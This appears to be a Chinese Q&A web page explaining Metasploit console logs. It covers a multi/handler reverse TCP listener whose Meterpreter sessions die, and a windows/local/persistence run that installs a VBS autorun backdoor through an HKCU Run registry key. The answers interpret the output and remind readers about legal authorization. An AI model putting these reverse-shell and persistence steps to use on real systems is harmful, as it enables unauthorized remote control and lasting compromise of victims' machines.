msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.1.108:4567 [*] Sending stage (77780 bytes) to 192.168.1.102 [*] - Meterpreter session 2 closed. Reason: Died [*] Sending stage (77780 bytes) to 192.168.1.102 [*] Sending stage (77780 bytes) to 192.168.1.102 [*] Sending stage (77780 bytes) to 192.168.1.102 [-] Meterpreter session 4 is not valid and will be closed [*] - Meterpreter session 4 closed. [*] Sending stage (77780 bytes) to 192.168.1.102 [*] Sending stage (77780 bytes) to 192.168.1.102 [*] Sending stage (77780 bytes) to 192.168.1.102 [*] - Meterpreter session 3 closed. Reason: Died、
时间: 2024-02-12 11:03:14 浏览: 207
这是一个 Metasploit 框架下的 exploit(multi/handler) 模块的运行结果。根据输出信息可以看出,Metasploit 成功启动了一个反向 TCP handler,监听本地 IP 地址为 192.168.1.108,端口号为 4567。接着,Metasploit 分别尝试向 IP 地址为 192.168.1.102 的目标主机发送大小为 77780 字节的 payload,但是 Meterpreter 会话 2、3、4 都在执行过程中异常退出,具体原因可能是目标主机上的防火墙或杀毒软件拦截了 payload 或者 exploit 中出现了 bug。需要进一步排查问题原因。
相关问题
msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.1.108:4567 [*] Sending stage (77780 bytes) to 192.168.1.102 [*] - Meterpreter session 2 closed. Reason: Died
这是一个 Metasploit 框架下的 exploit(multi/handler) 模块的运行结果。根据输出信息可以看出,Metasploit 成功启动了一个反向 TCP handler,监听本地 IP 地址为 192.168.1.108,端口号为 4567。接着,Metasploit 发送了一个大小为 77780 字节的 payload 到 IP 地址为 192.168.1.102 的目标主机。但是,Meterpreter 会话 2 在执行过程中异常退出,具体原因可能是目标主机上的防火墙或杀毒软件拦截了 payload 或者 exploit 中出现了 bug。
msf6 exploit(windows/local/persistence) > run [*] Running persistent module against DESKTOP-UL26GPM via session ID: 7 [+] Persistent VBS script written on DESKTOP-UL26GPM to C:\Users\1-2\AppData\Local\Temp\znovHQot.vbs [*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kkapahXyyH [+] Installed autorun on DESKTOP-UL26GPM as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kkapahXyyH [*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DESKTOP-UL26GPM_20230717.4409/DESKTOP-UL26GPM_20230717.4409.rc
根据您提供的Metasploit命令输出,您正在运行`exploit/windows/local/persistence`模块来创建持久性后门。下面是命令的执行结果:
- 持久性VBS脚本已经被写入目标主机 DESKTOP-UL26GPM 的 `C:\Users\1-2\AppData\Local\Temp\znovHQot.vbs` 文件中。
- 后门已经安装在 DESKTOP-UL26GPM 的 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kkapahXyyH 注册表键中,以实现开机自启。
- Meterpreter RC 文件 `/home/kali/.msf4/logs/persistence/DESKTOP-UL26GPM_20230717.4409/DESKTOP-UL26GPM_20230717.4409.rc` 已经被清理。
上述操作将在目标主机上创建一个持久性后门,以确保在系统重新启动后自动运行恶意脚本。请注意,在进行此类操作之前,确保您已经获得合法授权,并且仅在合规和合法的环境中进行。同时,务必了解和遵守当地法律法规。
阅读全文